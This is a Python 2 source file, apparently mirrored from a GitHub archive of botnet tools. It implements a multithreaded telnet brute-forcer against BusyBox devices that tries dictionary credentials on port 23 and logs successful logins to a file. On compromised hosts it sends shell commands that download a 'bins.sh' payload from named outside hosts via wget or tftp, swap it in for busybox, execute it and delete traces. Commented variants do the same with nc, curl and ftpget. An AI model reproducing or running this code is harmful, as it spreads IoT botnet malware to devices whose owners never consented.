6
0
mirror of https://github.com/threatland/TL-BOTS synced 2024-06-20 14:00:11 +00:00
TL-BOTS/TL.EXPLOIT_SCAN/EXPLOIT.BusyBox/busybox.a271c2.py
2019-10-02 16:41:26 -04:00

145 lines
5.1 KiB
Python

#!/usr/bin/env python
#
#
# I didnt really check for back doors so please be careful
#
#
#
from Queue import *
from sys import stdout
import threading, sys, time, random, socket, re, os, logging
if len(sys.argv) < 5:
print "Example: python %s targets.txt dictionary.txt <threads(1-100)> <ips per scan(100-1000)>" % (str(sys.argv[0]))
print "Dictionary should be in user:pass format"
sys.exit(1)
print "\x1b[1;32m***********************\x1b[1;35m"
print "\x1b[1;32m* YAAAAAAAAAAAAAAAAAA *\x1b[1;35m"
print "\x1b[1;32m***********************\x1b[1;35m"
#ip=sys.argv[1]
filename=sys.argv[2]
threads = int(sys.argv[3])
h0h0 = int(sys.argv[4])
ips = open(sys.argv[1], "r").readlines()
queue = Queue()
qcount = 0
#cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://kimuuk.tk/bins/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper
wget = "cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /; wget http://dfvfeuv.tk/bins/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
#echo = "cd /var/; rm -rf busybox filename; rm -rf busybox armv4l.sh; echo -ne 'GET /armv4l.sh HTTP/1.0\r\nHost: 46.166.185.159\r\n\r\n' | nc 46.166.185.159 80 > armv4l.sh; chmod +x *; sed -i 1,9d armv4l.sh; cp /bin/busybox ./; busybox cat armv4l.sh > armv4l.sh; chmod +x armv4l.sh; ./armv4l.sh; rm -rf busybox armv4l.sh;"
tftp1 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp 46.166.185.159 -c get bins.sh; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
tftp2 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp -r bins.sh -g 46.166.185.159; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
#ftpget = "cd /var/; rm -rf armv4l; ftpget -v -u anonymous -p anonymous -P 21 46.166.185.159 armv4l armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
#curl = "cd /var/; rm -rf armv4l; curl -O http://kimuuk.tk/bins/armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
for ip in ips:
qcount += 1
stdout.write("\r[%d] Added to queue" % qcount)
stdout.flush()
queue.put(ip)
print "\n"
def readUntil(tn, string, timeout=20):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
#raise Exception('TIMEOUT!')
def worker():
try:
while True:
try:
if queue.empty() == True:
sys.exit(1)
iplist = []
h0h0h0 = h0h0 + 1
#print "\033[33mGathering IPs\033[37m"%(ip.rstrip("\n"))
for x in xrange(h0h0h0):
ip = queue.get()
iplist.append(ip)
#print "\033[33mIP Address Obtained \033[32m%s\033[37m"%(ip.rstrip("\n"))
queue.task_done()
time.sleep(1.5)
for ip in iplist:
t = threading.Thread(target=ipthread, args=(ip.rstrip(),"null"))
t.start()
time.sleep(0.009)
time.sleep(1)
#print "\033[32mStarting Telnet Threads\033[37m"
except:
print "\033[31mWORKER ERROR\033[37m" #will fuk up if more threads/workers then ips in list
pass
except:
pass
def attempt(IP,UserName,Password):
try:
ip=IP
username=UserName
password=Password
tn = socket.socket()
tn.settimeout(5)
tn.connect((IP, 23))
#except Exception:
#print "[%s] Timeout"%(count)
#try:
time.sleep(0.01)
hoho = ''
hoho += readUntil(tn, ":")
if "ogin" in hoho or "sername" in hoho:
tn.send(UserName + "\n")
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, ":")
if "assword" in hoho:
tn.send(Password + "\n")
tn.send("wget\n")
tn.send("tftp\n")
tn.send("ifconfig\n")
time.sleep(3)
except Exception:
tn.close()
try:
mp = ''
mp += tn.recv(1024)
#if "#" in mp or "$" in mp or "@" in mp or ">" in mp:
if "addr" in mp or "Usage" in mp or "wget:" in mp or "tftp:" in mp or "ifconfig:" in mp or "@" in mp:
tn.send(wget + "\n")
#tn.send(echo + "\n")
tn.send(tftp1 + "\n")
tn.send(tftp2 + "\n")
#tn.send(ftpget + "\n")
#tn.send(curl + "\n")
print '\x1b[1;32mFound \x1b[1;31m '+IP+':23 \x1b[1;35m'+UserName+':\x1b[1;36m'+Password+'\x1b[1;33m'
f = open('session.txt', 'a')
f.write("%s:23 %s:%s\n" % (IP, UserName, Password))
f.close()
time.sleep(15)
tn.close()
except Exception:
tn.close()
def ipthread(ip,null):
fd = open(filename, "r")
for line in fd.readlines():
username, password = line.strip().split(":")
t = threading.Thread(target=attempt, args=(ip,username,password))
t.start()
time.sleep(0.3)
fd.close()
for g in xrange(threads):
t = threading.Thread(target=worker)
t.setDaemon(True)
t.start()
time.sleep(0.001)
queue.join()
print "Finished!"